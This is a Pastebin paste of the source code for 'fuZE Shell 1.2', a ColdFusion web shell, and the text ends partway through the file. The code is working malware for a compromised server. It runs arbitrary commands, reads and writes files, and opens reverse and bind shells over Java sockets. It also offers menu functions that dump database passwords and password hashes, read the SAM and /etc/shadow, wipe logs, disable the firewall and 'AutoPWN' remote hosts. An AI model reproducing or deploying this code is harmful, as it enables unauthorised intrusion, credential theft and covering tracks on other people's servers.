Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

Untitled

a guest Dec 5th, 2018 180 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. <html>
  2.  
  3. <!---
  4. #======================================#
  5. # DeV: XiX           .###      9/26/11 #
  6. #                    #                 #
  7. #              ###  /##/               #
  8. #             #    ,#                  #
  9. # v3r 1.2     \#####`                  #
  10. #======================================#
  11. #                 FuZE                 #
  12. #======================================#
  13. #                                      #
  14. # Changes in this release:             #
  15. # > AutoPWN improved                   #
  16. #                                      #
  17. # ThX ^_^:                             #
  18. # > fractal - css & jquery             #
  19. # > chippy1337                         #
  20. # > MoJiNao, xXx, & Seraph             #
  21. #                                      #
  22. #======================================#
  23. --->
  24.  
  25. <!--- _________Login_config_________ ---->
  26. <cfset UserName="hackintosh">
  27. <cfset Password="b98c1264f01b63dd0cb305e05d903eeb6ce6d98c"> <!--- MD5 --->
  28. <!--- ------------------------------ ---->
  29.  
  30. <head>
  31. <cfsetting requesttimeout="3600">
  32. <cfset tickBegin = GetTickCount()>
  33. <cfset so = CreateObject("java", "java.lang.System")>
  34. <cftry>
  35. <cfobject type="com" class="scripting.filesystemobject" name="fso" action="connect">
  36. <cfcatch type="any">
  37. <cftry>
  38. <cfobject type="com" class="scripting.filesystemobject" name="fso" action="create">
  39. <cfcatch> <!--- N/A ---> </cfcatch>
  40. </cftry>
  41. </cfcatch>
  42. </cftry>
  43. <cfif isDefined("FSO")><cfset Drives = FSO.Drives></cfif>
  44. <cfset icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAESElEQVR42u2VW0ibZxzG3y/xEKPxlFjrYSqWFkXxgPUAzjCJurkLW+rooL3pTe9Km4uW3ll3V+YYyOjN2EAEUQRjMjwNhI0Zg0zCrAYRvHCIh0HUiOdj0uf5yFe0cTUbpr3xhZd8id/7Pr//8z8oiY+8pEuAjyFaVlamPT4+jnQ6nZ4PBmAymXITExMfxMTE1Gq12pylpaU/e3t7Pws5QG1trSEuLu77vLy8e7GxsWr+dnR0JCYnJ3/t6Oj4IqQA9fX1BVlZWX3Z2dmfhIeHC5VKJWC9ODg4EBMTE7bOzs7bIQOoq6u7npOT40hPTzco4j6fTxweHoq9vT0xOzvb3d7e/nVIAIxGowaRj+fm5uZHRES8jZx7YWHh7/X19WG32z04NDRkCQkAon9RWVnZrNFohFqtloV3d3cPZ2ZmHm9sbPw4MDDgVd69cIDy8nJ9UVHRHKzXMXraToDp6Wkziq713fcvHADt9ryiouJlVFSUCAsLkyt+eXn5t8XFRZPVavWFHKCxsdGF3OfRfkmShNfrFePj41+tra05t7a2jlCQHnzf/leA0tLSOFh3F71rwmc+oriCIlLzIn8uJ1E81WeJl5SU3EAKZjBwpMjISBmADuCM2NnZEdvb22J+ft48PDzcGgCAwxKozWlpac3JycmxtI/Vy0u4KL6/vy8YSVdX182zAKqrq5uQ/28w6QRbj4s1QIjNzU3hcDj4bMYMCARA1f4A6x7xsCKuXMDFS9i/Ho/H2d3dHQBQWFgoZWZmzl7Dov1K3xMc+Rcul0usrKyI+Ph4M55PA+Dw5wUFBYMYlRIrV4mYorReiYITDDY6LRZLAAAc/LK4uLgfs16OngOHwnNzcwKtJ8MzDampqWaM4dMAsM2G3cDDSuQomD9woAeiB4RQQJBPN3LYc4b9Iwj+Uwqtrq7KogjmW6TtH8IwAL8jv09NTf11CgA5X05KSrpqMBgE2wcgDuhW2Ww2rwhiYerdQtFaOXQYACHw/fXo6GjReWdlgJSUlF2IayhOWgB8NzIy8iwYcaROj6gmUDvpBGCh0i3cdWdsbKw3KAA4sASAFBYgc48L7HDAiOnle99h2K5DtH1oOSPFWSOY8wK1ZEf0VcEEIAPAfltCQkKDTqeTLWQUyJkF3fAz9jFyyRZVQUhCganYJWjPq3jnKYRvsFXpHPOO530EcdNut7uCBtDr9bcQvRUtItcAo+Gl/GRFs6242SHc/F15h3YTmH3OgYP3zf39/a3BiL8F4EIKrMg9i4k1IINwU1h55nRTALiU4URxTjn87Sf8w3kYrPgpAKRBC/pOONFAJ5BHwZRER0fLm/VBGEIQgC1FcQojFayVV2jbJ21tbUF1TgAAV0ZGhgSx+xB7Doh8BYKOKBAEYA34e9oHiNcQftHS0vLLfxE+E+DkqqmpyUJhxp90wZ8Gye+ADx3gbmpqWvw/wucCfKh1CXAJ8AZf/R8/6E7SXwAAAABJRU5ErkJggg==">
  45. <cfset icon_close = "data:image/gif;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAANAA0DASIAAhEBAxEB/8QAFQABAQAAAAAAAAAAAAAAAAAABgT/xAAlEAACAgAEBQUAAAAAAAAAAAABAwIEAAUREgYHIUFhEzFCcaH/xAAVAQEBAAAAAAAAAAAAAAAAAAAGB//EABgRAQADAQAAAAAAAAAAAAAAAAEAAgMR/9oADAMBAAIRAxEAPwA9SsMvZrdQqw9Ta9iQkfUkYSju/D474Kc1cxLnZfBLGRiuLB1kdT1j1OD93i67ZezYlaFSdJ2yBOpkSTqT3I9h9Yi4lzuxnDkusLhGcI7TKPz8nzisNunIezxa2Fn/2Q==">
  46. <title>.:: &fnof;uZE Shell ::.</title>
  47. <link rel="SHORTCUT ICON" href="<cfoutput>#icon#</cfoutput>">
  48. <style type="text/css">
  49. html,body{font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11px;background-color:black;color:#bbbbbb;height:98%;overflow:inherit}
  50. table.header-table td { padding:10px; border-width:5px; border-style:outset; }
  51. table.content-table td { padding:10px; border-width:5px; border-style:outset; }
  52. table.function-table td { padding:10px; border-width:5px; border-style:outset; }
  53. textarea.report { width:100%;min-width:400px;background-color:black;color:#bbbbbb; }
  54. #mask { position:absolute; z-index:9000; background-color:#000; display:none; }
  55. #boxes .window { position:fixed;  left:0;  top:0;  width:530px; display:none;  z-index:9999; padding:20px; background-color:black;color:#bbbbbb;border-left:solid 1px #00009f;border-right:solid 1px #00009f;border-bottom:solid 1px #00009f; }
  56. #layer1_handle{position:relative;background-color:#00009F;padding:2px;text-align:center;color:#FFF;vertical-align:middle;top:-35px;margin-left:-21px;margin-right:-21px;}
  57. #_close{float:right;text-decoration:none;color:#FFF;}
  58. #_color{background-color:black;color:#bbbbbb;}
  59. #nav a{height:14px;display:block;border:1px solid #000;color:#FFF;text-decoration:none;background-color:#000098;padding-bottom:5px}
  60. #nav a:hover{background-color:#696AF6;color:#FFF}
  61. ._btn{padding:0;margin:0;width:80px;font-size:12px;background-color:#0000B0;color:#bbbbbb;}
  62. .container{position:relative;top:-115px;text-align:center;font-size:14px;float:right;}
  63. .menu{position:relative;top:-21px;height:20px;width:280px;float:right;padding-top:5px;padding-bottom:5px;}
  64. </style>
  65. <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
  66. <script>
  67. $(document).ready(function() {  
  68.     //select all the a tag with name equal to modal
  69.     $('a[name=modal]').click(function(e) {
  70.         //Cancel the link behavior
  71.         e.preventDefault();
  72.         //Get the A tag
  73.         var id = $(this).attr('href');    
  74.         //Get the screen height and width
  75.         var maskHeight = $(document).height();
  76.         var maskWidth = $(window).width();    
  77.         //Set height and width to mask to fill up the whole screen
  78.         $('#mask').css({'width':maskWidth,'height':maskHeight});        
  79.         //transition effect    
  80.         $('#mask').fadeIn(1000);  
  81.         $('#mask').fadeTo("slow",0.8);      
  82.         //Get the window height and width
  83.         var winH = $(window).height();
  84.         var winW = $(window).width();              
  85.         //Set the popup window to center
  86.         $(id).css('top',  winH/2-$(id).height()/2);
  87.         $(id).css('left', winW/2-$(id).width()/2);    
  88.         //transition effect
  89.         $(id).fadeIn(2000);    
  90.     });
  91.     //if close button is clicked
  92.     $('.window .close').click(function (e) {
  93.         //Cancel the link behavior
  94.         e.preventDefault();
  95.         $('#mask, .window').hide();
  96.     });    
  97.     //if mask is clicked
  98.     $('#mask').click(function () {
  99.         $(this).hide();
  100.         $('.window').hide();
  101.     });        
  102. });
  103. </script>
  104. </head>
  105. <body>
  106.  
  107. <cfif IsDefined("LoginButton")>
  108. <cfif Form.UserName eq "#UserName#" and Hash("#Form.Password#") eq "#Password#">
  109. <cflogin>
  110. <cfloginuser name="#UserName#" password="#Password#" roles="admin">
  111. </cflogin>
  112. </cfif>
  113. </cfif>
  114.  
  115. <cfif IsDefined("LogoutButton")>
  116.  <cflogout>
  117. </cfif>
  118.  
  119. <cfif IsUserLoggedIn() eq "Yes">
  120. <div id="boxes">    
  121.     <div id="execute" class="window">
  122.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Console</div>
  123.         <center><pre>:: Execute command on server ::</pre></center>
  124.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  125.         <input type="text" id="_color" name="exec" size=40 <cfif isdefined("Form.exec")>value="<cfoutput>#htmleditformat(Form.exec)#</cfoutput>"</cfif>>
  126.         <input name="submit" value="Execute" class="_btn" type="submit"><br />
  127.         <input type=checkbox name="nolimit"> No execution time limit
  128.         </form><br />
  129.     </div>
  130.     <div id="edit" class="window">
  131.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Edit</div>
  132.         <center><pre>:: Edit file ::</pre></center>
  133.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  134.         File path | <input type="text" id="_color" name="EditFile" size=40 <cfif isDefined("Form.EditFile")>value="<cfoutput>#htmleditformat(Form.EditFile)#</cfoutput>"</cfif>>
  135.         <input name="submit" value="Edit" class="_btn" type="submit">
  136.         </form><br />
  137.     </div>
  138.     <div id="reverse" class="window">
  139.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Reverse Shell</div>
  140.         <center><pre>:: Reverse shell ::</pre></center>
  141.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  142.         <center><input type="text" id="_color" name="reverseip" size=15 <cfif isDefined("Form.reverseip")>value="<cfoutput>#htmleditformat(Form.reverseip)#</cfoutput>"</cfif>> :
  143.         <input type="text" id="_color" name="reverseport" size=5 <cfif isDefined("Form.reverseport")>value="<cfoutput>#htmleditformat(Form.reverseport)#</cfoutput>"</cfif>>
  144.         <input name="submit" value="Connect" class="_btn" type="submit"></center>
  145.         </form>
  146.     </div>
  147.     <div id="bind" class="window">
  148.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Bindshell</div>
  149.         <center><pre>:: Bindshell ::</pre></center>
  150.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  151.         <center>[1024-65535] <input type="text" id="_color" name="bindport" size=10 <cfif isdefined("Form.bindport")>value="<cfoutput>#htmleditformat(Form.bindport)#</cfoutput>"</cfif>>
  152.         <input name="submit" value="Bind" class="_btn" type="submit">
  153.         <a href="data:text/html;base64,PGh0bWw+Cjxib2R5Pgo8aDI+VGlwczwvaDI+Cjx1bD4KPGxpPkRpc2FibGUgdGhlIGZpcmV3YWxsIGJlZm9yZSB1c2luZyB0aGlzIGZ1bmN0aW9uIChuZXRzaCBmaXJld2FsbCBzZXQgb3Btb2RlIGRpc2FibGUpLjwvbGk+CjxsaT5EbyBub3Qgc3RvcCB0aGUgcmVxdWVzdCBvciB0aGUgYmluZHNoZWxsIHdpbGwgZmFpbCwgYW5kIHlvdSB3aWxsIG5lZWQgdG8gdXNlIGFub3RoZXIgcG9ydDwvbGk+CjxsaT5UaGUgYmluZHNoZWxsIG9ubHkgYWNjZXB0cyB2YWxpZCBleGVjdXRhYmxlcyBmcm9tIHdpdGhpbiB0aGUgT1MncyBkZWZpbmVkIFBBVEhzLiBNYWtlIHN1cmUgaXQgZXhpc3RzLCBhbmQgaXQgaXMgaW4gb25lIG9mIHRoZSBkaXJlY3RvcmllcyBkZWZpbmVkIGJ5IHRoZSBlbnZpcm9ubWVudCAncGF0aCcgdmFyaWFibGUuIEZvciBleGFtcGxlIChXaW5kb3dzKSwgJ2RpcicgZG9lcyBub3QgZXhpc3QsIGJ1dCAnaG9zdG5hbWUnIGRvZXMuPC9saT4KPGxpPlRoaXMgaXMgYSBWRVJZIHVuc3RhYmxlIENGIGJpbmRzaGVsbCAocHJvdG90eXBlKSEgTGF0ZXIgcmVsZWFzZXMgd2lsbCBmaXggdGhlIHZhcmlvdXMgaXNzdWVzIGluIHRoZSBwcmVzZW50IG9uZS48L2xpPgo8L3VsPgo8L2JvZHk+CjwvaHRtbD4K"> [Tips]</a></center>
  154.         </form>
  155.     </div>
  156.     <div id="functions" class="window">
  157.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Functions</div>
  158.         <center><pre>:: Functions ::</pre></center>
  159.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  160.         <select name="function" style="width: 325px">
  161.         <option selected="yes">Select a function</option><optgroup label="ColdFusion"><option>Dump datasource passwords</option><option>Dump CF hashes</option><option>Restart JRUN server (CF)</option><option>Wipe ColdFusion logs</option></optgroup><optgroup label="Windows"><option>Disable Windows firewall</option><option>Enable Telnet service</option><option>Show opened ports [W]</option><option>Read SAM</option><option>Read SECURITY</option><option>Read SYSTEM</option><option>Read IIS paths</option><option>View open sessions [W]</option><option>View local shares</option><option>View domain shares</option><option>View users</option><option>View running processes [W]</option><option>View system info [W]</option><option>Check disk for consistency</option></optgroup><optgroup label="Linux"><option>Find SUID files</option><option>Find SGID files</option><option>Find all *conf* files</option><option>Find all .*_history files</option>
  162.         <option>Find all *.pwd files</option><option>Find all .*rc files</option><option>Find all writable directories and files</option><option>Find all writable directories and files in current dir</option><option>Read /etc/passwd</option><option>Read /etc/shadow</option><option>Read /proc/self/environ</option><option>Show opened ports [L]</option><option>View open sessions [L]</option><option>View recent sessions</option><option>View running processes [L]</option>
  163.         <option>View memory info</option><option>View CPU info</option><option>View system info [L]</option></optgroup></select><input name="submit" value="Execute" class="_btn" type="submit"></form>
  164.     </div>
  165.     <div id="decrypt" class="window">
  166.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Decrypter</div>
  167.         <center><pre>:: CF hash decrypter ::</pre></center>
  168.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  169.         B64 CF hash | <input type="text" id="_color" name="decrypt_hash" size=35 <cfif isdefined("Form.decrypt_hash")>value="<cfoutput>#htmleditformat(Form.decrypt_hash)#</cfoutput>"</cfif>>
  170.         <input name="submit" value="Decrypt" class="_btn" type="submit">
  171.         </form>
  172.     </div>
  173.     <div id="updown" class="window">
  174.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>File Transfer</div>
  175.         <center><pre>:: Upload/Download files on server ::</pre></center>
  176.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" enctype="multipart/form-data" name="Upload" id="Upload"><center>
  177.         <input type="file" name="File"/>
  178.         <input class="_btn" type="submit" name="Upload" value="Upload"/></center>
  179.         </form>
  180.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  181.         Path | <input type="text" id="_color" name="Download" size=40 <cfif isDefined("Form.Download")>value="<cfoutput>#htmleditformat(Form.Download)#</cfoutput>"</cfif>>
  182.         <input name="submit" value="Download" class="_btn" type="submit">
  183.         </form>
  184.     </div>
  185.     <div id="upremote" class="window">
  186.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Remote upload</div>
  187.         <center><pre>:: Upload files from remote server ::</pre></center>
  188.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  189.         URL | <input type="text" id="_color" name="RUpload" size=40 <cfif isDefined("Form.RUpload")>value="<cfoutput>#htmleditformat(Form.RUpload)#</cfoutput>"</cfif>>
  190.         <input name="submit" value="Upload" class="_btn" type="submit">
  191.         </form>
  192.     </div>
  193.     <div id="runsql" class="window">
  194.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Sql</div>
  195.         <center><pre>:: Run SQL query ::</pre></center>
  196.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  197.         SQL query | <input type="text" id="_color" name="exec_sql" size=35<cfif isdefined("Form.exec_sql")>value="<cfoutput>#htmleditformat(Form.exec_sql)#</cfoutput>"</cfif>><br />
  198.         Datasource | <input type="text" id="_color" name="datasource" size=15<cfif isdefined("Form.datasource")>value="<cfoutput>#htmleditformat(Form.datasource)#</cfoutput>"</cfif>><br />
  199.         User : Pass | <input type="text" id="_color" name="db_username" size=15 <cfif isdefined("Form.db_username")>value="<cfoutput>#htmleditformat(Form.db_username)#</cfoutput>"</cfif>><input type="text" id="_color" name="db_password" size=15 <cfif isdefined("Form.db_password")>value="<cfoutput>#htmleditformat(Form.db_password)#</cfoutput>"</cfif>><br />
  200.         <input name="submit" value="Run" class="_btn" type="submit">
  201.         </form>
  202.     </div>
  203.     <div id="scanlan" class="window">
  204.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Scan</div>
  205.         <center><pre>:: Scan LAN for CF ::</pre></center>
  206.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  207.         <center><input name="cfscan" value="Scan" class="_btn" type="submit"></center>
  208.         </form>
  209.     </div>
  210.     <div id="registry" class="window">
  211.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Registry</div>
  212.         <center><pre>:: Registry ::</pre></center>
  213.         <form method="post" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>"><table>
  214.         <tr><td>Path | </td><td><input name="regpath" type="text" id="_color" size="40" value="<cfif isDefined("Form.regpath")><cfoutput>#htmleditformat(Form.regpath)#</cfoutput><cfelse>HKEY_LOCAL_MACHINE\</cfif>" /></td></tr><tr>
  215.         <td>Key | </td><td><input type="text" id="_color" name="Entry" size="15" <cfif isDefined("Form.Entry")>value="<cfoutput>#htmleditformat(Form.Entry)#</cfoutput>"</cfif> /></td></tr><tr>
  216.         <td>New key | </td><td><input type="text" id="_color" name="newentry" size="15" <cfif isDefined("Form.newentry")>value="<cfoutput>#htmleditformat(Form.newentry)#</cfoutput>"</cfif> /></td></tr></table>
  217.         <select name="regtype">
  218.             <option value="dWord">dWord</option>
  219.             <option value="string">string</option>
  220.         </select>
  221.         <br />
  222.         <input class="_btn" type="submit" name="Submit" value="Submit" />
  223.         </form>
  224.     </div>
  225.     <div id="autopwn" class="window">
  226.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>AutoPWN</div>
  227.         <center><pre>:: AutoPWN remote CF ::</pre></center>
  228.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  229.         Target | http://<input type="text" id="_color" name="target_host" size=40 <cfif isDefined("Form.target_host")>value="<cfoutput>#htmleditformat(Form.target_host)#</cfoutput>"</cfif>>/
  230.         <input name="submit" value="AutoPWN" class="_btn" type="submit">
  231.         </form>
  232.     </div>
  233.     <div id="nuke" class="window">
  234.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Nuke</div>
  235.         <center><pre>:: Nuke shell ::</pre></center>
  236.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  237.         <center><input name="nuke" value="Nuke" class="_btn" type="submit"></center>
  238.         </form>
  239.     </div>
  240.     <div id="irc" class="window">
  241.         <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>IRC</div>
  242.         <center><pre>:: IRC datapipe ::</pre></center>
  243.         <table>
  244.         <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>"><center>
  245.         <tr><td>IP:</td><td><input type="text" id="_color" name="ircip" size=15 <cfif isDefined("Form.ircip")>value="<cfoutput>#htmleditformat(Form.ircip)#</cfoutput>"<cfelse>value="127.0.0.1"</cfif>></td></tr>
  246.         <tr><td>Port:</td><td><input type="text" id="_color" name="ircport" size=5 <cfif isDefined("Form.ircport")>value="<cfoutput>#htmleditformat(Form.ircport)#</cfoutput>"<cfelse>value="6667"</cfif>></td></tr>
  247.         <tr><td>Nick name:</td><td><input type="text" id="_color" name="ircnick" size=15 <cfif isDefined("Form.ircnick")>value="<cfoutput>#htmleditformat(Form.ircnick)#</cfoutput>"<cfelse>value="fuZE"</cfif>></td></tr>
  248.         <tr><td>User name:</td><td><input type="text" id="_color" name="ircuname" size=15 <cfif isDefined("Form.ircuname")>value="<cfoutput>#htmleditformat(Form.ircuname)#</cfoutput>"<cfelse>value="fuZE"</cfif>></td></tr>
  249.         <tr><td>Real name:</td><td><input type="text" id="_color" name="ircrname" size=20 <cfif isDefined("Form.ircrname")>value="<cfoutput>#htmleditformat(Form.ircrname)#</cfoutput>"<cfelse>value="fuZE CF IRC Datapipe"</cfif>></td></tr>
  250.         <tr><td>Channel:</td><td><input type="text" id="_color" name="ircchan" size=15 <cfif isDefined("Form.ircchan")>value="<cfoutput>#htmleditformat(Form.ircchan)#</cfoutput>"<cfelse>value="#fuZE"</cfif>></td></tr>
  251.         <tr><td><input name="submit" value="Connect" class="_btn" type="submit"></center></td></tr>
  252.         </form>
  253.         </table>
  254.     </div>
  255.     <div id="mask"></div>
  256. </div>
  257. <table class="header-table" width=100%>
  258. <tr>
  259. <td><img src="<cfoutput>#icon#</cfoutput>"><sup> &fnof;uZE Shell 1.2</sup></td>
  260. <td><div style="float:left;"><cfoutput><pre>#dateformat(now(),'mm-dd-yyyy')# #timeformat(now(),'HH:mm:ss')# Your IP: #cgi.remote_addr# [#cgi.remote_host#] Server IP: #cgi.local_addr# [#cgi.http_host#]</pre></cfoutput></div>
  261. <div style="float:right;"><cfform action="" method="post" name="LogoutForm"><cfinput class="_btn" type="submit" name="LogoutButton" value="Logout"></cfform></div>
  262. </td>
  263. </tr>
  264. <tr>
  265. <td align="right"><pre>OS :<br />CF :<br />ID :<br />CWD :<br />Drive info :</pre></td>
  266. <td>
  267. <cfoutput>
  268. <pre>#server.os.name# [#server.os.version#] #server.os.arch#<br />#server.coldfusion.productname# [#server.coldfusion.productlevel#] #server.coldfusion.productversion#<br />#so.getProperty("user.name")#<br />#getDirectoryFromPath(getCurrentTemplatePath())#<br /><cfif isDefined("FSO")><cfloop collection="#drives#" item="this"><cfif this.DriveLetter is not "A">#this.DriveLetter# [<cfif this.isReady AND ISDefined("this.TotalSize")>#NumberFormat(round(evaluate(this.TotalSize/1024/1024/1024)))# GB </cfif><cfswitch expression="#this.DriveType#">
  269. <cfcase value="1">Removable</cfcase>
  270. <cfcase value="2">Fixed</cfcase>
  271. <cfcase value="3">Network</cfcase>
  272. <cfcase value="4">CDROM</cfcase>
  273. <cfcase value="5">RAMDisk</cfcase>
  274. <cfdefaultcase>Unknown</cfdefaultcase>
  275. </cfswitch>] </cfif></cfloop><cfelse>N/A</cfif></pre>
  276. </cfoutput>
  277. </td>
  278. </tr>
  279. </table>
  280.  
  281. <table class="content-table" width=100%>
  282. <tr><td width="75%"><cfoutput>
  283. <cfif isdefined("Form.exec")>
  284.  <cfif isdefined("Form.nolimit")><cfset exectimeout=3600><cfelse><cfset exectimeout=10></cfif>
  285.  <cfif server.os.name neq "UNIX">
  286.   <pre>Executing 'cmd.exe /c #htmleditformat(Form.exec)#'</pre>
  287.   <cfexecute name="cmd.exe" arguments="/c #Form.exec#" timeout="#exectimeout#" variable="cmdout"></cfexecute>
  288.  <cfelse>
  289.   <pre>Executing 'sh -c "#htmleditformat(REReplace(Form.exec,"""","'","ALL"))#"'</pre>
  290.   <cfexecute name="sh" arguments="-c ""#REReplace(Form.exec,"""","'","ALL")#""" timeout="#exectimeout#" variable="cmdout"></cfexecute>
  291.  </cfif>
  292.  <textarea class="report" rows="20">#htmleditformat(cmdout)#</textarea>
  293. <cfelseif isdefined("Form.EditFile")>
  294. <pre>Editing file '#htmleditformat(Form.EditFile)#'</pre>
  295. <cftry>
  296. <cfif fileexists(Form.EditFile)>
  297. <!--- OK --->
  298. <cfelse>
  299. <cfthrow message="File not found">
  300. </cfif>
  301. <cffile action="Read" file="#Form.EditFile#" variable="FileData">
  302. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  303. <textarea name="FileContent" class="report" rows="20"><cfoutput>#htmleditformat(FileData)#</cfoutput></textarea>
  304. Save to | <input type="text" id="_color" name="SaveFile" size=40 value="<cfoutput>#Form.EditFile#</cfoutput>"> <input name="submit" value="Save" class="_btn" type="submit">
  305. </form>
  306. <cfcatch><textarea class="report" rows="20">Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></textarea></cfcatch>
  307. </cftry>
  308. <cfelseif isDefined("Form.SaveFile")>
  309. <pre>Saving file '#htmleditformat(Form.SaveFile)#'</pre>
  310. <textarea class="report" rows="20">
  311. <cftry>
  312. <cffile action="Write" file="#Form.SaveFile#" output="#Form.FileContent#" addnewline = "no">Save success
  313. <cfcatch>Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
  314. </cftry>
  315. </textarea>
  316. <cfelseif isdefined("Form.bindport")>
  317. <pre>Binding shell to port #htmleditformat(Form.bindport)#</pre>
  318. <textarea class="report" rows="20">
  319. <cftry>
  320. <cfscript>
  321. try{
  322.  
  323. // Create socket
  324. serversocket=createObject("java","java.net.ServerSocket");
  325. serversocket.init(Form.bindport);
  326. writeoutput("ServerSocket created at port #serversocket.getLocalPort()##chr(10)#");
  327.  
  328. // Accept incoming connections
  329. connection=serversocket.accept();
  330. writeoutput("Connection received from #connection.getInetAddress().getHostName()##chr(10)#");
  331.  
  332. // Establish connection
  333. try{
  334. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(connection.getInputStream()));
  335. outstream=createObject("java","java.io.PrintWriter").init(connection.getOutputStream());
  336. writeoutput("Connection successful!#chr(10)#");
  337. } catch (IOException e) {
  338. writeoutput("IO Exception: Read failed#chr(10)#");
  339. }
  340.  
  341. // Communicate
  342. outstream.println(".:: fuZE CF Bindshell ::.");
  343. outstream.print("> ");
  344. outstream.flush();
  345. while(True){
  346. str = instream.readLine();
  347. cmd = str.split(" ");
  348. if (not str.matches("exit")){
  349. p = createObject("java","java.lang.ProcessBuilder").init(cmd).start();
  350. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  351. br = createObject("java","java.io.BufferedReader").init(i);
  352. line=br.readLine();
  353. while (isDefined("line")) {
  354. outstream.println(line);
  355. outstream.flush();
  356. line = br.readLine();
  357. }
  358. br.close();
  359. i.close();
  360. outstream.print("> ");
  361. outstream.flush();
  362. }
  363. else {
  364. outstream.println("Terminating");
  365. outstream.close();
  366. instream.close();
  367. connection.close();
  368. serversocket.close();
  369. }
  370. }
  371.  
  372. }catch (Exception e) {
  373. writeoutput("Exception: Error#chr(10)#");
  374. }
  375. </cfscript>
  376. <cfcatch>Connection terminated</cfcatch>
  377. </cftry>
  378. </textarea>
  379. <cfelseif isDefined("Form.reverseip") and isDefined("Form.reverseport")>
  380. <pre>Sending shell to #htmleditformat(Form.reverseip)#:#htmleditformat(Form.reverseport)#</pre>
  381. <textarea class="report" rows="20">
  382. <cftry>
  383. <cfscript>
  384. try{
  385.  
  386. // Create socket
  387. socket=createObject("java","java.net.Socket");
  388.  
  389. // Connect to remote host
  390. socket.connect(createObject("java","java.net.InetSocketAddress").init(Form.reverseip,Form.reverseport));
  391. writeoutput("Remote port reached: #socket.isConnected()##chr(10)#");
  392.  
  393. // Establish connection
  394. try{
  395. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(socket.getInputStream()));
  396. outstream=createObject("java","java.io.PrintWriter").init(socket.getOutputStream());
  397. writeoutput("Connection successful!#chr(10)#");
  398. } catch (IOException e) {
  399. writeoutput("IO Exception: Read failed#chr(10)#");
  400. }
  401.  
  402. // Communicate
  403. outstream.println(".:: fuZE CF Reverse Shell ::.");
  404. outstream.print("> ");
  405. outstream.flush();
  406. while(True){
  407. str = instream.readLine();
  408. cmd = str.split(" ");
  409. if (not str.matches("exit")){
  410. p = createObject("java","java.lang.ProcessBuilder").init(cmd).start();
  411. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  412. br = createObject("java","java.io.BufferedReader").init(i);
  413. line=br.readLine();
  414. while (isDefined("line")) {
  415. outstream.println(line);
  416. outstream.flush();
  417. line = br.readLine();
  418. }
  419. br.close();
  420. i.close();
  421. outstream.print("> ");
  422. outstream.flush();
  423. }
  424. else {
  425. outstream.println("Terminating");
  426. outstream.close();
  427. instream.close();
  428. socket.close();
  429. }
  430. }
  431.  
  432. }catch (Exception e) {
  433. writeoutput("Exception: Error#chr(10)#");
  434. }
  435. </cfscript>
  436. <cfcatch>Connection terminated</cfcatch>
